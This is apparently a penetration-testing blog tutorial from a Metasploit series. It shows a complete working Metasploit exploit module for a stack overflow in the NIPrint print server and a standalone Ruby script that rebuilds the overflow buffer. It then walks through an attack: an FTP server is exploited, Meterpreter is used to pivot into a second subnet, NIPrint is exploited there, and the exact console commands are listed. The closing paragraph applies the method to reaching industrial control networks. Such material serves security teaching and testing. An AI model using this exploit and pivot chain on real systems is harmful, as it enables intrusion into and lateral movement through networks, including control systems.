Metasploit Basics – Part 4: Exploit and Attack Example
A couple of weeks ago I rewrote for Metasploit an exploit that I originally wrote for CANVAS. The exploit is for a network print server application called NIPrint. It is a fairly basic stack overflow and the code for the exploit is straightforward.
The key parts, from a Metasploit user's perspective, are the Targets section and the options section. A user needs to set the target host IP, the port if it is not the default (515), and the target operating system; the default target is Windows 2000 SP4. The top portion of the module sets up the metadata and options, while the lower section, the exploit method, builds the buffer and sends it.
```ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NIPrint stack overflow',
      'Description'    => %q{
        This module exploits a stack overflow in NIPrint server.
      },
      'Author'         => [ 'Charles Perine' ],
      'Version'        => '$Revision: 9999 $',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          # Room available for the encoded payload and the bytes the
          # vulnerable parser will not pass through unmodified.
          'Space'    => 1000,
          'BadChars' => "\x00\x0a\x0d\x25\x26\x3f",
        },
      'Platform'       => 'win',
      # Per-target return address used to overwrite the saved EIP.
      'Targets'        =>
        [
          ['Win2k SP4 Eng', { 'Ret' => 0x7C2EE9BB } ],
          ['WinXP SP3 Eng', { 'Ret' => 0x77DF9697 } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false
    ))

    # NIPrint listens on the LPR port by default.
    register_options(
      [
        Opt::RPORT(515)
      ], self.class)
  end

  def exploit
    connect

    # Layout: 47 NOPs | jmp short +0x10 | saved EIP | 20 NOPs | payload
    noppersled1 = make_nops(47)
    jmpcode     = "\xeb\x10"              # jump over the return address into the second sled
    noppersled2 = make_nops(20)
    eip         = [target.ret].pack('V')  # 32-bit little-endian

    sploit = noppersled1 + jmpcode + eip + noppersled2 + payload.encoded

    sock.put(sploit)

    handler
    disconnect
  end
end
```
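To make the buffer layout concrete, here is an added example (my own, not part of the original module or of the Metasploit project) that builds the same request outside the framework so the offsets can be inspected. It reuses the module's two return addresses and its bad-character list; the 0xCC bytes stand in for `payload.encoded` and are a constructed placeholder, not shellcode. The helpers `jmp_target`, `jmp_lands_in_sled?`, `bad_bytes` and `usable_targets` are names I chose for this example.

```ruby
# Added example: reproduce the NIPrint module's buffer layout without msf,
# then check the two things that decide whether the overwrite works.
BAD_CHARS = "\x00\x0a\x0d\x25\x26\x3f".b.bytes.freeze   # copied from the module
TARGETS = {                                              # copied from the module
  'Win2k SP4 Eng' => 0x7C2EE9BB,
  'WinXP SP3 Eng' => 0x77DF9697,
}.freeze

NOPS1_LEN      = 47
NOPS2_LEN      = 20
JMP_OFFSET     = NOPS1_LEN                 # 47: "\xeb\x10" sits here
EIP_OFFSET     = JMP_OFFSET + 2            # 49: saved return address is overwritten here
NOPS2_OFFSET   = EIP_OFFSET + 4            # 53: second NOP sled
PAYLOAD_OFFSET = NOPS2_OFFSET + NOPS2_LEN  # 73: payload starts here

# Same concatenation the module performs: nops | jmp | ret | nops | payload.
def build_buffer(ret_addr, payload)
  nops1 = "\x90".b * NOPS1_LEN
  jmp   = "\xeb\x10".b            # jmp rel8: skips the 4-byte ret and part of sled 2
  eip   = [ret_addr].pack('V')    # 32-bit little-endian, as target.ret is packed
  nops2 = "\x90".b * NOPS2_LEN
  nops1 + jmp + eip + nops2 + payload.b
end

# Offset the short jump transfers control to: next instruction + signed rel8.
def jmp_target(buf)
  rel8 = buf.getbyte(JMP_OFFSET + 1)
  rel8 -= 256 if rel8 > 127
  JMP_OFFSET + 2 + rel8
end

# The jump must land inside the second sled, not on the ret bytes or past the sled.
def jmp_lands_in_sled?(buf)
  (NOPS2_OFFSET...PAYLOAD_OFFSET).cover?(jmp_target(buf))
end

# Bytes from the module's BadChars list that appear in a byte string.
def bad_bytes(bytes)
  bytes.b.each_byte.select { |b| BAD_CHARS.include?(b) }.uniq.map { |b| format('0x%02x', b) }
end

# A target is only usable if its packed return address contains no bad byte.
def usable_targets
  TARGETS.select { |_, ret| bad_bytes([ret].pack('V')).empty? }.keys
end

if __FILE__ == $0
  buf = build_buffer(TARGETS['Win2k SP4 Eng'], "\xcc".b * 16)   # constructed placeholder payload
  puts "total length:   #{buf.bytesize}"
  puts "ret at offset:  #{EIP_OFFSET} = #{buf[EIP_OFFSET, 4].unpack1('H*')}"
  puts "jmp lands at:   #{jmp_target(buf)} (in sled 2: #{jmp_lands_in_sled?(buf)})"
  puts "bad bytes:      #{bad_bytes(buf).inspect}"
  puts "usable targets: #{usable_targets.inspect}"
end
```

The useful check here is the last two lines of output: the framework's encoder removes bad characters from the payload, but it does nothing about the return address or the jump stub you hand-write, so those bytes have to be verified against the same list.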
What follows is a run-through of an attack that covers some of the subjects from this and my previous Metasploit entries. My attack machine is on the same subnet, 192.168.76.0/24, as a Windows XP system running a vulnerable FTP server at 192.168.76.136. The FTP server is also connected to a second subnet, 10.0.0.0/24, where a Windows 2000 machine at 10.0.0.1 runs the NIPrint application. In this example I will not show system scanning with a tool like Nessus, only exploitation.
First I ran the exploit against the FTP server.
Once connected, I checked which other networks the FTP server is attached to and saw that it has an interface on 10.0.0.0/24. To pivot through it, I added a route for that network through the Meterpreter session, session 1. Then I ran an enumeration script to see which other systems were reachable.
The scan shows that 10.0.0.1 is up. I already know that this second system is running the NIPrint server; an attacker would use other reconnaissance tools, or simply monitor the network, to determine that a system on the network is running NIPrint.
Now I run the exploit against the second system, and its routing table shows that it sits on a different network from the first system.
Here is a list of commands I used:
```
use windows/ftp/easyftp_cwd_fixret
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.76.136
show options
exploit

route
background

route add 10.0.0.0 255.255.255.0 1
sessions -i 1
run netenum -ps -r 10.0.0.0/16
background

use windows/misc/myniprint
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 10.0.0.1
show options
exploit

route
```
Many of the sites we visit have a common setup: an RDP station sitting in the DMZ between the corporate network and the control network. That system can typically RDP to one other system in the control network, and once on the control network there is very little access control between the systems. Using a methodology similar to the one described above, an attacker could work his way to the RDP station and then into the control network.